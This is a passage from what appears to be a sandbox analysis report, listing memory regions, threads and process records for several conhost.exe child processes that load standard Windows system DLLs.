Region: id = 2753 start_va = 0xf38a520000 end_va = 0xf38a6a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f38a520000" filename = "" Region: id = 2754 start_va = 0xf38a6b0000 end_va = 0xf38a830fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f38a6b0000" filename = "" Region: id = 2755 start_va = 0xf38a840000 end_va = 0xf38bc3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f38a840000" filename = "" Region: id = 2756 start_va = 0x7ff6c3f20000 end_va = 0x7ff6c401ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3f20000" filename = "" Region: id = 2757 start_va = 0x7ff6c404b000 end_va = 0x7ff6c404cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c404b000" filename = "" Region: id = 2758 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2759 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2760 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2761 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2762 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2763 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2764 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2765 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2766 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2767 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2768 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2769 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4701 start_va = 0xf38a1e0000 end_va = 0xf38a1effff entry_point = 0x0 region_type = private name = "private_0x000000f38a1e0000" filename = "" Region: id = 4702 start_va = 0xf38a460000 end_va = 0xf38a49ffff entry_point = 0x0 region_type = private name = "private_0x000000f38a460000" filename = "" Region: id = 4703 start_va = 0xf38a4a0000 end_va = 0xf38a4dffff entry_point = 0x0 region_type = private name = "private_0x000000f38a4a0000" filename = "" Region: id = 4704 start_va = 0xf38a4e0000 end_va = 0xf38a4effff entry_point = 0x0 region_type = private name = "private_0x000000f38a4e0000" filename = "" Region: id = 4705 start_va = 0xf38bc40000 end_va = 0xf38bf76fff entry_point = 0xf38bc40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4706 start_va = 0xf38bf80000 end_va = 0xf38c190fff entry_point = 0x0 region_type = private name = "private_0x000000f38bf80000" filename = "" Region: id = 4707 start_va = 0xf38c1a0000 end_va = 0xf38c3b4fff entry_point = 0x0 region_type = private name = "private_0x000000f38c1a0000" filename = "" Region: id = 4708 start_va = 0xf38c3c0000 end_va = 0xf38c4d4fff entry_point = 0x0 region_type = private name = "private_0x000000f38c3c0000" filename = "" Region: id = 4709 start_va = 0xf38c4e0000 end_va = 0xf38c6fcfff entry_point = 0x0 region_type = private name = "private_0x000000f38c4e0000" filename = "" Region: id = 4710 start_va = 0xf38c700000 end_va = 0xf38c815fff entry_point = 0x0 region_type = private name = "private_0x000000f38c700000" filename = "" Region: id = 4711 start_va = 0x7ff6c4049000 end_va = 0x7ff6c404afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4049000" filename = "" Region: id = 4712 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4713 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4714 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4715 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4716 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4717 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4718 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4719 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4720 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 148 os_tid = 0xf8c Thread: id = 193 os_tid = 0x3d4 Thread: id = 215 os_tid = 0x1060 Thread: id = 308 os_tid = 0x1200 Process: id = "118" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xfb80000" os_pid = "0xf90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "75" os_parent_pid = "0xe2c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2322 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2323 start_va = 0x5aa7e50000 end_va = 0x5aa7e6ffff entry_point = 0x0 region_type = private name = "private_0x0000005aa7e50000" filename = "" Region: id = 2324 start_va = 0x5aa7e70000 end_va = 0x5aa7e83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005aa7e70000" filename = "" Region: id = 2325 start_va = 0x5aa7e90000 end_va = 0x5aa7ecffff entry_point = 0x0 region_type = private name = "private_0x0000005aa7e90000" filename = "" Region: id = 2326 start_va = 0x7df5ff600000 end_va = 0x7ff5ff5fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff600000" filename = "" Region: id = 2327 start_va = 0x7ff6c4350000 end_va = 0x7ff6c4372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4350000" filename = "" Region: id = 2328 start_va = 0x7ff6c437d000 end_va = 0x7ff6c437efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c437d000" filename = "" Region: id = 2329 start_va = 0x7ff6c437f000 end_va = 0x7ff6c437ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c437f000" filename = "" Region: id = 2330 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2331 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2332 start_va = 0x5aa7fe0000 end_va = 0x5aa80dffff entry_point = 0x0 region_type = private name = "private_0x0000005aa7fe0000" filename = "" Region: id = 2333 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2334 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2796 start_va = 0x5aa7e50000 end_va = 0x5aa7e5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005aa7e50000" filename = "" Region: id = 2797 start_va = 0x5aa7e60000 end_va = 0x5aa7e66fff entry_point = 0x0 region_type = private name = "private_0x0000005aa7e60000" filename = "" Region: id = 2798 start_va = 0x5aa7ed0000 end_va = 0x5aa7f8dfff entry_point = 0x5aa7ed0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2799 start_va = 0x5aa7f90000 end_va = 0x5aa7fcffff entry_point = 0x0 region_type = private name = "private_0x0000005aa7f90000" filename = "" Region: id = 2800 start_va = 0x5aa7fd0000 end_va = 0x5aa7fd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005aa7fd0000" filename = "" Region: id = 2801 start_va = 0x5aa80e0000 end_va = 0x5aa80e6fff entry_point = 0x0 region_type = private name = "private_0x0000005aa80e0000" filename = "" Region: id = 2802 start_va = 0x5aa80f0000 end_va = 0x5aa8277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005aa80f0000" filename = "" Region: id = 2803 start_va = 0x5aa8280000 end_va = 0x5aa8280fff entry_point = 0x0 region_type = private name = "private_0x0000005aa8280000" filename = "" Region: id = 2804 start_va = 0x5aa8290000 end_va = 0x5aa8290fff entry_point = 0x0 region_type = private name = "private_0x0000005aa8290000" filename = "" Region: id = 2805 start_va = 0x5aa82b0000 end_va = 0x5aa82bffff entry_point = 0x0 region_type = private name = "private_0x0000005aa82b0000" filename = "" Region: id = 2806 start_va = 0x5aa82c0000 end_va = 0x5aa8440fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005aa82c0000" filename = "" Region: id = 2807 start_va = 0x5aa8450000 end_va = 0x5aa984ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005aa8450000" filename = "" Region: id = 2808 start_va = 0x7ff6c4250000 end_va = 0x7ff6c434ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4250000" filename = "" Region: id = 2809 start_va = 0x7ff6c437b000 end_va = 0x7ff6c437cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c437b000" filename = "" Region: id = 2810 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2811 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2812 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2813 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2814 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2815 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2816 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2817 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2818 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2819 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2820 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2821 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4657 start_va = 0x5aa9850000 end_va = 0x5aa988ffff entry_point = 0x0 region_type = private name = "private_0x0000005aa9850000" filename = "" Region: id = 4658 start_va = 0x5aa9890000 end_va = 0x5aa99a2fff entry_point = 0x0 region_type = private name = "private_0x0000005aa9890000" filename = "" Region: id = 4659 start_va = 0x5aa99b0000 end_va = 0x5aa99bffff entry_point = 0x0 region_type = private name = "private_0x0000005aa99b0000" filename = "" Region: id = 4660 start_va = 0x5aa99c0000 end_va = 0x5aa9cf6fff entry_point = 0x5aa99c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4661 start_va = 0x5aa9d00000 end_va = 0x5aa9f1dfff entry_point = 0x0 region_type = private name = "private_0x0000005aa9d00000" filename = "" Region: id = 4662 start_va = 0x5aa9f20000 end_va = 0x5aaa131fff entry_point = 0x0 region_type = private name = "private_0x0000005aa9f20000" filename = "" Region: id = 4663 start_va = 0x5aaa140000 end_va = 0x5aaa351fff entry_point = 0x0 region_type = private name = "private_0x0000005aaa140000" filename = "" Region: id = 4664 start_va = 0x5aaa360000 end_va = 0x5aaa477fff entry_point = 0x0 region_type = private name = "private_0x0000005aaa360000" filename = "" Region: id = 4665 start_va = 0x5aaa480000 end_va = 0x5aaa4bffff entry_point = 0x0 region_type = private name = "private_0x0000005aaa480000" filename = "" Region: id = 4666 start_va = 0x7ff6c4379000 end_va = 0x7ff6c437afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4379000" filename = "" Region: id = 4667 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4668 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4669 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4670 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4671 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4672 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4673 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4674 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4675 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 149 os_tid = 0xf94 Thread: id = 194 os_tid = 0x9cc Thread: id = 217 os_tid = 0x1068 Thread: id = 306 os_tid = 0x11f8 Process: id = "119" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xfc93000" os_pid = "0xf98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "76" os_parent_pid = "0xe34" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2335 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2336 start_va = 0x496a600000 end_va = 0x496a61ffff entry_point = 0x0 region_type = private name = "private_0x000000496a600000" filename = "" Region: id = 2337 start_va = 0x496a620000 end_va = 0x496a633fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000496a620000" filename = "" Region: id = 2338 start_va = 0x496a640000 end_va = 0x496a67ffff entry_point = 0x0 region_type = private name = "private_0x000000496a640000" filename = "" Region: id = 2339 start_va = 0x7df5ff4d0000 end_va = 0x7ff5ff4cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff4d0000" filename = "" Region: id = 2340 start_va = 0x7ff6c4050000 end_va = 0x7ff6c4072fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4050000" filename = "" Region: id = 2341 start_va = 0x7ff6c407c000 end_va = 0x7ff6c407cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c407c000" filename = "" Region: id = 2342 start_va = 0x7ff6c407e000 end_va = 0x7ff6c407ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c407e000" filename = "" Region: id = 2343 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2344 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2345 start_va = 0x496a710000 end_va = 0x496a80ffff entry_point = 0x0 region_type = private name = "private_0x000000496a710000" filename = "" Region: id = 2346 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2347 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2531 start_va = 0x496a600000 end_va = 0x496a60ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000496a600000" filename = "" Region: id = 2532 start_va = 0x496a610000 end_va = 0x496a616fff entry_point = 0x0 region_type = private name = "private_0x000000496a610000" filename = "" Region: id = 2533 start_va = 0x496a680000 end_va = 0x496a6bffff entry_point = 0x0 region_type = private name = "private_0x000000496a680000" filename = "" Region: id = 2534 start_va = 0x496a6c0000 end_va = 0x496a6c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000496a6c0000" filename = "" Region: id = 2535 start_va = 0x496a6d0000 end_va = 0x496a6d6fff entry_point = 0x0 region_type = private name = "private_0x000000496a6d0000" filename = "" Region: id = 2536 start_va = 0x496a6e0000 end_va = 0x496a6e0fff entry_point = 0x0 region_type = private name = "private_0x000000496a6e0000" filename = "" Region: id = 2537 start_va = 0x496a6f0000 end_va = 0x496a6f0fff entry_point = 0x0 region_type = private name = "private_0x000000496a6f0000" filename = "" Region: id = 2538 start_va = 0x496a810000 end_va = 0x496a8cdfff entry_point = 0x496a810000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2539 start_va = 0x496a970000 end_va = 0x496a97ffff entry_point = 0x0 region_type = private name = "private_0x000000496a970000" filename = "" Region: id = 2540 start_va = 0x496a980000 end_va = 0x496ab07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000496a980000" filename = "" Region: id = 2541 start_va = 0x496ab10000 end_va = 0x496ac90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000496ab10000" filename = "" Region: id = 2542 start_va = 0x496aca0000 end_va = 0x496c09ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000496aca0000" filename = "" Region: id = 2543 start_va = 0x7ff6c3f50000 end_va = 0x7ff6c404ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3f50000" filename = "" Region: id = 2544 start_va = 0x7ff6c407a000 end_va = 0x7ff6c407bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c407a000" filename = "" Region: id = 2545 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2546 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2547 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2548 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2549 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2550 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2551 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2552 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2553 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2554 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2555 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2556 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 150 os_tid = 0xf9c Thread: id = 195 os_tid = 0xc18 Thread: id = 204 os_tid = 0x101c Thread: id = 267 os_tid = 0x115c Process: id = "120" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xfdfb000" os_pid = "0xfa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "77" os_parent_pid = "0xe3c" 